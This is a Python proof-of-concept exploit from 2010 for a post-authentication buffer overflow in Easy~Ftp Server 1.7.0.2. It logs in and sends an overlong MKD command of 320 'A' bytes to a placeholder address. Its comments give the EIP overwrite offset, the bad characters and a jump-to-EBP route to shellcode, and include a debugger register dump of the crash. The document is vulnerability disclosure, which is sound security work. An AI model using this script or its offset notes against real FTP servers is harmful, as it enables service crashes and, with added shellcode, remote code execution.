#!/usr/bin/python

# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Date Found: 13/02/2010
# Developer contacted: 14/02/2010
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
# Tested on: Windows XP SP2/SP3 Professional
# Nod to the Exploit-DB Team

# Vulnerable command: MKD
# EIP is overwritten at bytes 269-270-271-272
# badchars: \x0a \x2f \x5c
# call/jmp EBP is one metod of jumping to our shellcode
# We have 268 bytes of room (max), seeing the jump or call EBP will bring us
# right at the start of our offset. So 265 bytes of room just to be sure.

#EAX 0081FCB4
#ECX 41414141
#EDX 00000010
#EBX 00000001
#ESP 0081FC78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@9_"
#EBP 005F5CA8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
#ESI 005F4B70
#EDI 005F4B70
#EIP 41414141
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDC000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
#ST0 empty %#.19L
#ST1 empty +UNORM 03E9 00000000 00000000
#ST2 empty 0.0
#ST3 empty 0.0
#ST4 empty -UNORM FAB4 00000000 00000002
#ST5 empty +UNORM 09B8 00000011 7C910732
#ST6 empty %#.19L
#ST7 empty -??? FFFF 7C910738 7C90EE18
# 3 2 1 0 E S P U O Z D I
#FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
#FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

import socket

buffer = "\x41" * 320

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close